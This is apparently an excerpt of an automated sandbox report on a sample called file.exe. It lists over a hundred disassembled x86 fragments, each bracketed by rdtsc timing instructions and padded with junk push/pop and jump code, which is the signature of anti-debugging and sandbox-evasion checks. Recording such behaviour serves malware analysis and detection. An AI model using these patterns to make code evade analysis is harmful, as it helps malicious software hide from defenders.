Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A533 second address: 85A539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A7EC second address: 85A7F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A7F8 second address: 85A7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A7FE second address: 85A802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85AA96 second address: 85AAAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B060h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85B33B second address: 85B340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85B340 second address: 85B346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8652B6 second address: 8652C0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF40CBDB926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8652C0 second address: 8652C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8646F7 second address: 8646FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 864898 second address: 8648A6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF40C70B058h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8648A6 second address: 8648B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FF40CBDB930h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 864A0A second address: 864A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 864A10 second address: 864A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 864A14 second address: 864A31 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007FF40C70B056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF40C70B05Ch 0x00000011 push ecx 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 864B75 second address: 864B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 864B7B second address: 864B87 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF40C70B05Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 864E7C second address: 864E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 864FE3 second address: 864FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF40C70B056h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86D339 second address: 86D33D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86D33D second address: 86D347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86C229 second address: 86C22D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86C22D second address: 86C251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FF40C70B056h 0x0000000d jnc 00007FF40C70B056h 0x00000013 jno 00007FF40C70B056h 0x00000019 popad 0x0000001a jne 00007FF40C70B05Eh 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86C251 second address: 86C25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86CB62 second address: 86CB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF40C70B067h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86CB7E second address: 86CB88 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B1DE second address: 86B1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B1E4 second address: 86B208 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF40CBDB935h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jne 00007FF40CBDB926h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 872DF4 second address: 872E06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 872E06 second address: 872E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875DFA second address: 875DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 875DFE second address: 875E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF40CBDB92Ch 0x0000000c js 00007FF40CBDB932h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 881B30 second address: 881B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 881B36 second address: 881B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 881833 second address: 881839 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88562C second address: 88563A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF40CBDB928h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 889BD6 second address: 889BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B062h 0x00000007 jmp 00007FF40C70B05Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 889BF9 second address: 889C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 jbe 00007FF40CBDB953h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF40CBDB92Fh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8897D2 second address: 8897DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jc 00007FF40C70B056h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88EA01 second address: 88EA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88EA05 second address: 88EA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF40C70B05Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8972A6 second address: 8972AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8972AA second address: 8972AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8972AE second address: 8972B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 899155 second address: 89916E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007FF40C70B056h 0x00000009 pop edx 0x0000000a jns 00007FF40C70B058h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89916E second address: 899180 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF40CBDB926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FF40CBDB926h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 899180 second address: 89918F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007FF40C70B056h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89918F second address: 899195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 899195 second address: 8991AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF40C70B05Ch 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A2474 second address: 8A2494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF40CBDB936h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A2494 second address: 8A249A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A0B1E second address: 8A0B2A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF40CBDB92Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A0B2A second address: 8A0B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF40C70B068h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A0B4D second address: 8A0B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A0B53 second address: 8A0B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A0B57 second address: 8A0B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A0B5B second address: 8A0B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A0B6B second address: 8A0B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A0F95 second address: 8A0F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A0F9E second address: 8A0FCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40CBDB933h 0x00000007 jmp 00007FF40CBDB939h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A0FCE second address: 8A1001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF40C70B061h 0x00000008 ja 00007FF40C70B056h 0x0000000e jmp 00007FF40C70B067h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A1001 second address: 8A1026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF40CBDB938h 0x0000000c je 00007FF40CBDB926h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A1026 second address: 8A102A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A130C second address: 8A1310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A1310 second address: 8A1330 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A1330 second address: 8A1335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A1335 second address: 8A1345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF40C70B05Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A1345 second address: 8A1349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A14C3 second address: 8A14C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A14C7 second address: 8A14E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF40CBDB932h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A20D1 second address: 8A2106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF40C70B060h 0x0000000c push edx 0x0000000d jnc 00007FF40C70B056h 0x00000013 jmp 00007FF40C70B066h 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A2106 second address: 8A211E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF40CBDB932h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A5E2E second address: 8A5E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FF40C70B05Ah 0x0000000f jo 00007FF40C70B056h 0x00000015 jc 00007FF40C70B056h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A5970 second address: 8A598B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF40CBDB937h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A598B second address: 8A599C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B05Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A599C second address: 8A59B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF40CBDB934h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A59B9 second address: 8A59F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF40C70B062h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edi 0x00000017 pop edi 0x00000018 jmp 00007FF40C70B064h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A59F5 second address: 8A59FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A5B49 second address: 8A5B61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B05Fh 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A73AF second address: 8A73B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF40CBDB926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B003C second address: 8B0042 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0042 second address: 8B0048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B72A2 second address: 8B72A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B72A8 second address: 8B72C0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF40CBDB926h 0x00000008 jo 00007FF40CBDB926h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FF40CBDB93Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B70FE second address: 8B711B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jp 00007FF40C70B058h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF40C70B05Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C52DB second address: 8C52DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C52DF second address: 8C52E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C52E5 second address: 8C52EA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C52EA second address: 8C52F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C4EB7 second address: 8C4EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C4EBC second address: 8C4EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C4EC2 second address: 8C4EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C4EC6 second address: 8C4ED6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF40C70B056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DAF79 second address: 8DAF83 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF40CBDB92Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D9F29 second address: 8D9F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D9F2D second address: 8D9F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D9F36 second address: 8D9F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DA0D2 second address: 8DA0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DA0DB second address: 8DA0F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF40C70B062h 0x00000007 jc 00007FF40C70B05Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DA392 second address: 8DA396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DA396 second address: 8DA39C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DA92D second address: 8DA931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DA931 second address: 8DA935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DA935 second address: 8DA94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF40CBDB931h 0x0000000b rdtsc
